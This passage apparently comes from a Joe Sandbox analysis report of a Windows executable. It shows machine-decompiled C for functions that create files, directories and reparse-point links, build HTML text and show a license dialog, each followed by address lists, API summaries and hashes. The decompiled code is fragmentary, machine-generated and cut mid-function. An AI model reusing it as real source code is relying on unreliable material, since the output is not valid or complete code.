				_t204 = _t203 & 0xffffff00 | _t109 == 0x00000000;
				 *(_t253 - 0xd) = _t204;
				if(_t109 == 0) {
					_t236 = _t253 - 0x1074;
				}
				if(_t204 != 0) {
					_t194 = E00CE6088(_t236, L"UNC\\", 4);
					_t256 = _t256 + 0xc;
					if(_t194 == 0) {
						_t195 = 0x5c;
						 *((short*)(_t253 - 0x207c)) = _t195;
						_t199 = _t253 - 0x207a;
						_t236 = _t236 + 6;
					}
				}
				E00CE6066(_t199, _t236);
				_t112 = E00CE3E13(_t253 - 0x207c);
				_t237 =  *((intOrPtr*)(_t253 + 8));
				_t200 =  *(_t253 + 0xc);
				 *(_t253 - 0x18) = _t112;
				if( *((char*)(_t237 + 0x7197)) != 0) {
					L12:
					E00CCA0B1(_t200, _t204, _t237, _t253, _t200, 1,  *(_t237 + 0x714b) & 0x000000ff);
					if(E00CCA231(_t200) != 0) {
						_t186 = E00CCA28F(E00CCA243(_t200));
						_push(_t200);
						if(_t186 == 0) {
							E00CCA1E0();
						} else {
							E00CCA18F();
						}
					}
					if( *((char*)(_t244 + 0x10f1)) != 0 ||  *((char*)(_t244 + 0x2104)) != 0) {
						__eflags = CreateDirectoryW(_t200, 0);
						if(__eflags != 0) {
							goto L21;
						}
						_t201 = 0;
						E00CC2021(__eflags, 0x14, 0, _t200);
						E00CC6D83(0xd01098, 9);
						goto L42;
					} else {
						_t182 = CreateFileW(_t200, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t182 != 0xffffffff) {
							CloseHandle(_t182);
							L21:
							_t117 =  *((intOrPtr*)(_t244 + 0x1100));
							__eflags = _t117 - 3;
							if(_t117 != 3) {
								__eflags = _t117 - 2;
								if(_t117 == 2) {
									L27:
									_t233 =  *(_t253 - 0x2c);
									_t205 =  *(_t253 - 0x14) & 0x0000ffff;
									_t238 =  *(_t253 - 0x18) & 0x0000ffff;
									 *_t233 = 0xa000000c;
									_t245 = _t205 + _t205;
									 *((short*)(_t233 + 0xa)) = _t245;
									 *((short*)(_t233 + 4)) = 0x10 + (_t238 + _t205) * 2;
									 *((intOrPtr*)(_t233 + 6)) = 0;
									E00CE6066(_t233 + 0x14, _t253 - 0x107c);
									_t246 =  *(_t253 - 0x2c);
									 *((short*)(_t246 + 0xc)) = _t245 + 2;
									 *((short*)(_t246 + 0xe)) = _t238 + _t238;
									E00CE6066(_t246 + ( *(_t253 - 0x14) + 0xb) * 2, _t253 - 0x207c);
									_t134 =  *(_t253 - 0xd) & 0x000000ff ^ 0x00000001;
									__eflags = _t134;
									 *(_t246 + 0x10) = _t134;
									L28:
									_t239 = CreateFileW(_t200, 0xc0000000, 0, 0, 3, 0x2200000, 0);
									__eflags = _t239 - 0xffffffff;
									if(_t239 != 0xffffffff) {
										__eflags = DeviceIoControl(_t239, 0x900a4, _t246, ( *(_t246 + 4) & 0x0000ffff) + 8, 0, 0, _t253 - 0x30, 0);
										if(__eflags != 0) {
											E00CC9556(_t253 - 0x30b4);
											 *(_t253 - 4) = 1;
											E00CC7A7B(_t253 - 0x30b4, _t239);
											_t240 =  *((intOrPtr*)(_t253 + 8));
											_t247 =  *((intOrPtr*)(_t253 + 0x10));
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											asm("sbb ecx, ecx");
											E00CC9DA2(_t253 - 0x30b4,  *((intOrPtr*)(_t253 + 0x10)),  ~( *(_t240 + 0x82d0)) &  *((intOrPtr*)(_t253 + 0x10)) + 0x00001040,  ~( *(_t240 + 0x82d4)) & _t247 + 0x00001048,  ~( *(_t240 + 0x82d8)) & _t247 + 0x00001050);
											E00CC9620(_t253 - 0x30b4);
											__eflags =  *((char*)(_t240 + 0x71a8));
											if( *((char*)(_t240 + 0x71a8)) == 0) {
												E00CCA4ED(_t200,  *((intOrPtr*)(_t247 + 0x24)));
											}
											_t201 = 1;
											E00CC959A(_t253 - 0x30b4);
											goto L42;
										}
										CloseHandle(_t239);
										E00CC2021(__eflags, 0x15, 0, _t200);
										_t154 = GetLastError();
										__eflags = _t154 - 5;
										if(_t154 == 5) {
											L33:
											__eflags = E00CD07BC();
											if(__eflags == 0) {
												E00CC15C6(_t253 - 0x7c, 0x18);
												E00CD15FE(_t253 - 0x7c);
											}
											L35:
											E00CC6DCB(0xd01098, __eflags);
											E00CC6D83(0xd01098, 9);
											_t250 =  *((intOrPtr*)(_t253 + 0x10));
											_push(_t200);
											__eflags =  *((char*)(_t250 + 0x10f1));
											if( *((char*)(_t250 + 0x10f1)) == 0) {
												DeleteFileW();
											} else {
												RemoveDirectoryW();
											}
											goto L38;
										}
										__eflags = _t154 - 0x522;
										if(__eflags != 0) {
											goto L35;
										}
										goto L33;
									}
									E00CC6C23(_t200);
									E00CC6D83(0xd01098, 9);
									goto L38;
								}
								__eflags = _t117 - 1;
								if(_t117 != 1) {
									goto L38;
								}
								goto L27;
							}
							_t234 =  *(_t253 - 0x2c);
							_t229 =  *(_t253 - 0x14) & 0x0000ffff;
							_t242 =  *(_t253 - 0x18) & 0x0000ffff;
							 *_t234 = 0xa0000003;
							_t252 = _t229 + _t229;
							 *((short*)(_t234 + 0xa)) = _t252;
							 *((short*)(_t234 + 4)) = 0xc + (_t242 + _t229) * 2;
							 *((intOrPtr*)(_t234 + 6)) = 0;
							E00CE6066(_t234 + 0x10, _t253 - 0x107c);
							_t246 =  *(_t253 - 0x2c);
							 *((short*)(_t246 + 0xc)) = _t252 + 2;
							 *((short*)(_t246 + 0xe)) = _t242 + _t242;
							E00CE6066(_t246 + ( *(_t253 - 0x14) + 9) * 2, _t253 - 0x207c);
							goto L28;
						}
						E00CC6C23(_t200);
						goto L38;
					}
				} else {
					if( *(_t253 - 0xd) != 0) {
						L38:
						_t201 = 0;
						L42:
						E00CC15FB(_t253 - 0x2c);
						 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
						return _t201;
					}
					_t190 = E00CCBCC3(_t244 + 0x1104);
					_t269 = _t190;
					if(_t190 != 0) {
						goto L38;
					}
					_push(_t244 + 0x1104);
					_push(_t200);
					_push(_t244 + 0x28);
					_push(_t237);
					if(E00CC7861(_t269) == 0) {
						goto L38;
					}
					goto L12;
				}
			}







































                                                    0x00cc6faa
                                                    0x00cc6fb4
                                                    0x00cc6fc0
                                                    0x00cc6fc7
                                                    0x00cc6fd1
                                                    0x00cc6fd6
                                                    0x00cc6fd6
                                                    0x00cc6fe5
                                                    0x00cc6fe8
                                                    0x00cc6fed
                                                    0x00cc6ff0
                                                    0x00cc7007
                                                    0x00cc701a
                                                    0x00cc701d
                                                    0x00cc7025
                                                    0x00cc7031
                                                    0x00cc7036
                                                    0x00cc703b
                                                    0x00cc703e
                                                    0x00cc7043
                                                    0x00cc7045
                                                    0x00cc7045
                                                    0x00cc704d
                                                    0x00cc7057
                                                    0x00cc705c
                                                    0x00cc7061
                                                    0x00cc7065
                                                    0x00cc7066
                                                    0x00cc706d
                                                    0x00cc7073
                                                    0x00cc7073
                                                    0x00cc7061
                                                    0x00cc7078
                                                    0x00cc7084
                                                    0x00cc7089
                                                    0x00cc708f
                                                    0x00cc7092
                                                    0x00cc709c
                                                    0x00cc70d6
                                                    0x00cc70e1
                                                    0x00cc70ee
                                                    0x00cc70f7
                                                    0x00cc70fc
                                                    0x00cc70ff
                                                    0x00cc7108
                                                    0x00cc7101
                                                    0x00cc7101
                                                    0x00cc7101
                                                    0x00cc70ff
                                                    0x00cc7114
                                                    0x00cc71e1
                                                    0x00cc71e3
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc71ea
                                                    0x00cc71ef
                                                    0x00cc71fb
                                                    0x00000000
                                                    0x00cc7127
                                                    0x00cc7139
                                                    0x00cc7142
                                                    0x00cc7155
                                                    0x00cc715b
                                                    0x00cc715b
                                                    0x00cc7161
                                                    0x00cc7164
                                                    0x00cc7205
                                                    0x00cc7208
                                                    0x00cc7213
                                                    0x00cc7216
                                                    0x00cc7219
                                                    0x00cc721f
                                                    0x00cc7222
                                                    0x00cc7228
                                                    0x00cc722b
                                                    0x00cc7239
                                                    0x00cc723f
                                                    0x00cc724d
                                                    0x00cc7255
                                                    0x00cc7258
                                                    0x00cc725f
                                                    0x00cc7274
                                                    0x00cc7280
                                                    0x00cc7280
                                                    0x00cc7283
                                                    0x00cc7286
                                                    0x00cc729e
                                                    0x00cc72a0
                                                    0x00cc72a3
                                                    0x00cc72de
                                                    0x00cc72e0
                                                    0x00cc735d
                                                    0x00cc7369
                                                    0x00cc736d
                                                    0x00cc7372
                                                    0x00cc7375
                                                    0x00cc7386
                                                    0x00cc7399
                                                    0x00cc73ac
                                                    0x00cc73b7
                                                    0x00cc73c2
                                                    0x00cc73c7
                                                    0x00cc73ce
                                                    0x00cc73d4
                                                    0x00cc73d4
                                                    0x00cc73df
                                                    0x00cc73e1
                                                    0x00000000
                                                    0x00cc73e1
                                                    0x00cc72e3
                                                    0x00cc72ee
                                                    0x00cc72f3
                                                    0x00cc72f9
                                                    0x00cc72fc
                                                    0x00cc7305
                                                    0x00cc730a
                                                    0x00cc730c
                                                    0x00cc7313
                                                    0x00cc731b
                                                    0x00cc731b
                                                    0x00cc7320
                                                    0x00cc7327
                                                    0x00cc7330
                                                    0x00cc7335
                                                    0x00cc7338
                                                    0x00cc7339
                                                    0x00cc7340
                                                    0x00cc734a
                                                    0x00cc7342
                                                    0x00cc7342
                                                    0x00cc7342
                                                    0x00000000
                                                    0x00cc7340
                                                    0x00cc72fe
                                                    0x00cc7303
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc7303
                                                    0x00cc72ad
                                                    0x00cc72b6
                                                    0x00000000
                                                    0x00cc72b6
                                                    0x00cc720a
                                                    0x00cc720d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc720d
                                                    0x00cc716d
                                                    0x00cc7170
                                                    0x00cc7176
                                                    0x00cc7179
                                                    0x00cc717f
                                                    0x00cc7182
                                                    0x00cc7190
                                                    0x00cc7196
                                                    0x00cc71a4
                                                    0x00cc71ac
                                                    0x00cc71af
                                                    0x00cc71b6
                                                    0x00cc71cb
                                                    0x00000000
                                                    0x00cc71d0
                                                    0x00cc714a
                                                    0x00000000
                                                    0x00cc714a
                                                    0x00cc709e
                                                    0x00cc70a2
                                                    0x00cc7350
                                                    0x00cc7350
                                                    0x00cc73e6
                                                    0x00cc73e9
                                                    0x00cc73f6
                                                    0x00cc73fe
                                                    0x00cc73fe
                                                    0x00cc70af
                                                    0x00cc70b4
                                                    0x00cc70b6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc70c2
                                                    0x00cc70c3
                                                    0x00cc70c7
                                                    0x00cc70c8
                                                    0x00cc70d0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc70d0

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC6FAA
                                                    • _wcslen.LIBCMT ref: 00CC7013
                                                    • _wcslen.LIBCMT ref: 00CC7084
                                                      • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                      • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                      • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                    • API String ID: 3122303884-3508440684
                                                    • Opcode ID: d502f12da381699e073937578270b949921da9f26f00feba7350980356787a81
                                                    • Instruction ID: 5dbcb383ebd6ef09d2ae41895b61a45cb6145fa3213d24bf275f61f230db643d
                                                    • Opcode Fuzzy Hash: d502f12da381699e073937578270b949921da9f26f00feba7350980356787a81
                                                    • Instruction Fuzzy Hash: 674119B1D083887AEB20E770DD46FEE776CDF14344F04055EFA5AA7182D674AB449B21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CD9711 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00CD9711(void* __edx) {
				void* __ecx;
				void* _t20;
				short* _t24;
				void* _t28;
				void* _t29;
				intOrPtr* _t36;
				void* _t43;
				void* _t58;
				intOrPtr* _t60;
				short* _t62;
				short* _t64;
				intOrPtr* _t68;
				long _t70;
				void* _t72;
				void* _t73;

				_t58 = __edx;
				_t42 = _t43;
				if( *((intOrPtr*)(_t43 + 0x10)) == 0) {
					return _t20;
				}
				 *(_t72 + 8) =  *(_t72 + 8) & 0x00000000;
				_t60 =  *((intOrPtr*)(_t72 + 0x18));
				 *((char*)(_t72 + 0x13)) = E00CD95AA(_t60);
				_push(0x200 + E00CE3E13(_t60) * 2);
				_t24 = E00CE3E33(_t43);
				_t64 = _t24;
				if(_t64 == 0) {
					L16:
					return _t24;
				}
				E00CE6066(_t64, L"<html>");
				E00CE7686(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00CE7686(_t64, L"utf-8\"></head>");
				_t73 = _t72 + 0x18;
				_t68 = _t60;
				_t28 = 0x20;
				if( *_t60 != _t28) {
					L4:
					_t29 = E00CD1FDD(_t77, _t68, L"<html>", 6);
					 *((char*)(_t73 + 0x12)) = _t29 == 0;
					if(_t29 == 0) {
						_t60 = _t68 + 0xc;
					}
					E00CE7686(_t64, _t60);
					if( *((char*)(_t73 + 0x1a)) == 0) {
						E00CE7686(_t64, L"</html>");
					}
					_t81 =  *((char*)(_t73 + 0x13));
					if( *((char*)(_t73 + 0x13)) == 0) {
						_push(_t64);
						_t64 = E00CD9955(_t58, _t81);
					}
					_t70 = 9 + E00CE3E13(_t64) * 6;
					_t62 = GlobalAlloc(0x40, _t70);
					if(_t62 != 0) {
						_t13 = _t62 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t70 - 3, 0, 0) == 0) {
							 *_t62 = 0;
						} else {
							 *_t62 = 0xbbef;
							 *((char*)(_t62 + 2)) = 0xbf;
						}
					}
					L00CE3E2E(_t64);
					_t24 =  *0xd23180(_t62, 1, _t73 + 0x14);
					if(_t24 >= 0) {
						E00CD95EB( *((intOrPtr*)(_t42 + 0x10)));
						_t36 =  *((intOrPtr*)(_t73 + 0x10));
						 *0xcf3278(_t36,  *((intOrPtr*)(_t73 + 0x10)));
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *_t36 + 8))))();
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t68 = _t68 + 2;
					_t77 =  *_t68 - _t28;
				} while ( *_t68 == _t28);
				goto L4;
			}


















                                                    0x00cd9711
                                                    0x00cd9714
                                                    0x00cd971a
                                                    0x00cd985f
                                                    0x00cd985f
                                                    0x00cd9720
                                                    0x00cd9727
                                                    0x00cd9732
                                                    0x00cd9742
                                                    0x00cd9743
                                                    0x00cd9748
                                                    0x00cd974e
                                                    0x00cd985a
                                                    0x00000000
                                                    0x00cd985b
                                                    0x00cd975b
                                                    0x00cd9766
                                                    0x00cd9771
                                                    0x00cd9776
                                                    0x00cd9779
                                                    0x00cd977d
                                                    0x00cd9781
                                                    0x00cd978c
                                                    0x00cd9794
                                                    0x00cd979b
                                                    0x00cd97a2
                                                    0x00cd97a4
                                                    0x00cd97a4
                                                    0x00cd97a9
                                                    0x00cd97b5
                                                    0x00cd97bd
                                                    0x00cd97c3
                                                    0x00cd97c4
                                                    0x00cd97c9
                                                    0x00cd97cb
                                                    0x00cd97d3
                                                    0x00cd97d3
                                                    0x00cd97df
                                                    0x00cd97eb
                                                    0x00cd97ef
                                                    0x00cd97f9
                                                    0x00cd980e
                                                    0x00cd981b
                                                    0x00cd9810
                                                    0x00cd9810
                                                    0x00cd9815
                                                    0x00cd9815
                                                    0x00cd980e
                                                    0x00cd981f
                                                    0x00cd982d
                                                    0x00cd9836
                                                    0x00cd9841
                                                    0x00cd9846
                                                    0x00cd9852
                                                    0x00cd9858
                                                    0x00cd9858
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cd9783
                                                    0x00cd9783
                                                    0x00cd9783
                                                    0x00cd9786
                                                    0x00cd9786
                                                    0x00000000

                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00CD9736
                                                    • _wcslen.LIBCMT ref: 00CD97D6
                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00CD97E5
                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CD9806
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                    • API String ID: 1116704506-4209811716
                                                    • Opcode ID: 659b05d26be2f65a5ff5df1c6b7015c8808d2271a3c92209889e1af5fda91abe
                                                    • Instruction ID: ad2d56a3adaa5945573440aec76031bdf0ffc490b6dd6441e9136d78f966f700
                                                    • Opcode Fuzzy Hash: 659b05d26be2f65a5ff5df1c6b7015c8808d2271a3c92209889e1af5fda91abe
                                                    • Instruction Fuzzy Hash: CA3135361083817BE725AB21AC46F6FB7ACEF42720F14011FF611972D2EB749A0493A6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 70%
                                                    			E00CDB5C0(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				void* _t29;
				intOrPtr _t30;
				struct HWND__* _t34;
				intOrPtr _t35;
				void* _t36;
				struct HWND__* _t37;

				_t29 = __ecx;
				_t28 = _a12;
				_t35 = _a8;
				_t34 = _a4;
				if(E00CC1316(__edx, _t34, _t35, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t36 = _t35 - 0x110;
				if(_t36 == 0) {
					E00CDD69E(_t29, __edx, __eflags, __fp0, _t34);
					_t9 =  *0xd17b7c;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t34, 0x80, 1, _t9);
					}
					_t10 =  *0xd1ec84;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0xd1fc9c;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t34, _t11);
					}
					_t37 = GetDlgItem(_t34, 0x65);
					SendMessageW(_t37, 0x435, 0, 0x10000);
					SendMessageW(_t37, 0x443, 0,  *0xd230c4(0xf));
					 *0xd230c0(_t34);
					_t30 =  *0xd08444; // 0x0
					E00CD9ED5(_t30, __eflags,  *0xd0102c, _t37,  *0xd1fc98, 0, 0);
					L00CE3E2E( *0xd1fc9c);
					L00CE3E2E( *0xd1fc98);
					goto L16;
				}
				if(_t36 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t34, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}














                                                    0x00cdb5c0
                                                    0x00cdb5c1
                                                    0x00cdb5c7
                                                    0x00cdb5ce
                                                    0x00cdb5e7
                                                    0x00cdb6d3
                                                    0x00cdb6d5
                                                    0x00000000
                                                    0x00cdb6d5
                                                    0x00cdb5ed
                                                    0x00cdb5f3
                                                    0x00cdb620
                                                    0x00cdb625
                                                    0x00cdb62a
                                                    0x00cdb62c
                                                    0x00cdb637
                                                    0x00cdb637
                                                    0x00cdb63d
                                                    0x00cdb642
                                                    0x00cdb644
                                                    0x00cdb650
                                                    0x00cdb650
                                                    0x00cdb656
                                                    0x00cdb65b
                                                    0x00cdb65d
                                                    0x00cdb661
                                                    0x00cdb661
                                                    0x00cdb676
                                                    0x00cdb67e
                                                    0x00cdb694
                                                    0x00cdb69b
                                                    0x00cdb6a1
                                                    0x00cdb6b6
                                                    0x00cdb6c1
                                                    0x00cdb6cc
                                                    0x00000000
                                                    0x00cdb6d2
                                                    0x00cdb5f8
                                                    0x00cdb607
                                                    0x00000000
                                                    0x00cdb607
                                                    0x00cdb5fd
                                                    0x00cdb600
                                                    0x00cdb61b
                                                    0x00cdb60f
                                                    0x00cdb610
                                                    0x00000000
                                                    0x00cdb610
                                                    0x00cdb605
                                                    0x00cdb60e
                                                    0x00000000
                                                    0x00cdb60e
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                      • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                    • EndDialog.USER32(?,00000001), ref: 00CDB610
                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CDB637
                                                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CDB650
                                                    • SetWindowTextW.USER32(?,?), ref: 00CDB661
                                                    • GetDlgItem.USER32(?,00000065), ref: 00CDB66A
                                                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CDB67E
                                                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CDB694
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Item$TextWindow$Dialog
                                                    • String ID: LICENSEDLG
                                                    • API String ID: 3214253823-2177901306
                                                    • Opcode ID: ed81faa7e1a083a74ea98954d23888845ad38f00fe7b63e44ca3bb4658e13000
                                                    • Instruction ID: 5bf5ea699c2ba75b74370fe73ffe60e035f3da6c2ab8921c89bdebe47a08b06e
                                                    • Opcode Fuzzy Hash: ed81faa7e1a083a74ea98954d23888845ad38f00fe7b63e44ca3bb4658e13000
                                                    • Instruction Fuzzy Hash: 23219E32604305BBD2259F66ED4AF7B3B6DEB46B81F024016F704D23A0CB56DE03A675
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 45%
                                                    			E00CDFD10(void* __ebx, char* __edx, char* _a4) {
				int _v8;
				signed int _v12;
				char _v20;
				short* _v28;
				signed int _v32;
				short* _v36;
				int _v40;
				int _v44;
				intOrPtr _v60;
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				char _t33;
				int _t34;
				signed short _t36;
				signed short _t38;
				void* _t49;
				short* _t50;
				int _t52;
				int _t53;
				char* _t58;
				int _t59;
				void* _t60;
				char* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				char* _t69;
				intOrPtr _t70;
				int _t71;
				intOrPtr* _t72;
				void* _t74;
				short* _t75;
				void* _t78;
				signed int _t79;
				void* _t81;
				short* _t82;

				_t69 = __edx;
				_push(0xfffffffe);
				_push(0xcfc130);
				_push(E00CE2900);
				_push( *[fs:0x0]);
				_t82 = _t81 - 0x18;
				_t30 =  *0xcfe7ac; // 0x349e4b74
				_v12 = _v12 ^ _t30;
				_t31 = _t30 ^ _t79;
				_v32 = _t31;
				_push(__ebx);
				_push(_t75);
				_push(_t71);
				_push(_t31);
				 *[fs:0x0] =  &_v20;
				_v28 = _t82;
				_t58 = _a4;
				if(_t58 != 0) {
					_t61 = _t58;
					_t69 =  &(_t61[1]);
					do {
						_t33 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t33 != 0);
					_t62 = _t61 - _t69;
					_t34 = _t62 + 1;
					_v44 = _t34;
					if(_t34 > 0x7fffffff) {
						L17:
						E00CDFCF0(0x80070057);
						goto L18;
					} else {
						_t71 = MultiByteToWideChar(0, 0, _t58, _t34, 0, 0);
						_v40 = _t71;
						if(_t71 == 0) {
							L18:
							_t36 = GetLastError();
							if(_t36 > 0) {
								_t36 = _t36 & 0x0000ffff | 0x80070000;
							}
							E00CDFCF0(_t36);
							goto L21;
						} else {
							_v8 = 0;
							_t49 = _t71 + _t71;
							if(_t71 >= 0x1000) {
								_push(_t49);
								_t50 = E00CE3E33(_t62);
								_t82 =  &(_t82[2]);
								_t75 = _t50;
								_v36 = _t75;
								_v8 = 0xfffffffe;
							} else {
								E00CF2010(_t49);
								_v28 = _t82;
								_t75 = _t82;
								_v36 = _t75;
								_v8 = 0xfffffffe;
							}
							if(_t75 == 0) {
								L16:
								E00CDFCF0(0x8007000e);
								goto L17;
							} else {
								_t52 = MultiByteToWideChar(0, 0, _t58, _v44, _t75, _t71);
								if(_t52 == 0) {
									L21:
									if(_t71 >= 0x1000) {
										L00CE3E2E(_t75);
										_t82 =  &(_t82[2]);
									}
									_t38 = GetLastError();
									if(_t38 > 0) {
										_t38 = _t38 & 0x0000ffff | 0x80070000;
									}
									E00CDFCF0(_t38);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t79);
									_t70 = _v60;
									_push(_t71);
									_t72 = _t62;
									 *_t72 = 0xcf56f8;
									 *((intOrPtr*)(_t72 + 4)) =  *((intOrPtr*)(_t70 + 4));
									_t63 =  *((intOrPtr*)(_t70 + 8));
									 *((intOrPtr*)(_t72 + 8)) = _t63;
									 *(_t72 + 0xc) = 0;
									if(_t63 != 0) {
										 *0xcf3278(_t63, _t75);
										 *((intOrPtr*)( *((intOrPtr*)( *_t63 + 4))))();
									}
									return _t72;
								} else {
									__imp__#2(_t75);
									_t59 = _t52;
									if(_t71 >= 0x1000) {
										L00CE3E2E(_t75);
										_t82 =  &(_t82[2]);
									}
									if(_t59 == 0) {
										goto L16;
									} else {
										_t53 = _t59;
										goto L2;
									}
								}
							}
						}
					}
				} else {
					_t53 = 0;
					L2:
					 *[fs:0x0] = _v20;
					_pop(_t74);
					_pop(_t78);
					_pop(_t60);
					return E00CDFBBC(_t53, _t60, _v32 ^ _t79, _t69, _t74, _t78);
				}
			}








































                                                    0x00cdfd10
                                                    0x00cdfd13
                                                    0x00cdfd15
                                                    0x00cdfd1a
                                                    0x00cdfd25
                                                    0x00cdfd26
                                                    0x00cdfd29
                                                    0x00cdfd2e
                                                    0x00cdfd31
                                                    0x00cdfd33
                                                    0x00cdfd36
                                                    0x00cdfd37
                                                    0x00cdfd38
                                                    0x00cdfd39
                                                    0x00cdfd3d
                                                    0x00cdfd43
                                                    0x00cdfd46
                                                    0x00cdfd4b
                                                    0x00cdfd70
                                                    0x00cdfd72
                                                    0x00cdfd75
                                                    0x00cdfd75
                                                    0x00cdfd77
                                                    0x00cdfd78
                                                    0x00cdfd7c
                                                    0x00cdfd7e
                                                    0x00cdfd81
                                                    0x00cdfd89
                                                    0x00cdfe4d
